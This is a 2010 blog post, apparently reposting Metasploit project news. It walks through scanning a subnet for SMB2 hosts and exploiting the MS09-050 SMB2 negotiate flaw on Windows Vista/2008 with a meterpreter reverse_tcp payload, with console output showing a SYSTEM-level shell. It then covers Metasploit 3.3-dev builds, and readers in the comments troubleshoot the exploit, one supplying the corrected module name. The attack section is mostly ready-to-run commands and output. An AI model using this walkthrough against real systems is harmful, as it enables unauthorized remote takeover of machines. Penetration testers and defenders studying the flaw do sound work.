Unofficial blog

Saturday, January 2, 2010

Hack Windows Vista with Metasploit

Write:

msf> use auxiliary/scanner/smb/smb2
msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24
msf (auxiliary/smb2) > set THREADS 100
msf (auxiliary/smb2) > run

[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours

When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare.

Now that we have identified two systems with SMB2 enabled, its exploit time!

msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit

[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)...
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)

meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Voila! A great way to justify disabling SMB2 across your network.

Next item of interest -- we are now generating hourly builds of the 3.3-dev tree and making these available for download from the Metasploit web site. These come in two flavors and two sizes. We are offering the 3.3-dev package for Unix systems in both Full and Mini versions. The Mini version removes the SVN directories, many of the development source files, and the msfweb/msfgui interfaces.

For the first time, we are offering 3.3-dev packages for Windows (based on Cygwin 1.7 [HEAD]), also in Full and Mini versions. The Windows installer is lightweight and can be installed alongside an existing version of Metasploit. The Windows version can be installed to a USB key and made portable, just by specifying the proper path during the install. Finally, the Windows installer can be made to run in batch mode with a command line like the following:

C:\> framework-3.3-dev-mini.exe /S /D=C:\metasploit33dev

We would like to make sure everyone is aware of the freely-available Metasploit Unleashed Online Course developed by the Offensive Security team. The Metasploit Project is currently working with the team to expand the breadth and depth of this online course, with help from our own official Metasploit courseware. This course should continue to improve at rapid rate over the next few months.

Metasploit Blog

5 comments:

Waeta said...
This comment has been removed by the author.
Waeta said...

The exploit does not work (/windows/smb/smb2_negotiate_func_index)

Unknown said...

Waeta@
You should try "use windows/smb/ms09_050_smb2_negotiate_func_index"

Unknown said...

I have a problem. I'm trying to attack Windows Vista SP2 with Backtrack 5 R3. I set everything correctly and I write "exploit". All I get is that:

msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

[*] Started reverse handler on 192.168.56.103:4444
[*] Connecting to the target (192.168.56.101:445)...
[*] Sending the exploit packet (872 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
msf exploit(ms09_050_smb2_negotiate_func_index) >

What should I do?

Jason said...

It's not working dude. Sometimes it be like that with different exploits and different OS versions. I've seen exploits work on Vista but not Vista Ultimate, could not explain why...

Post a Comment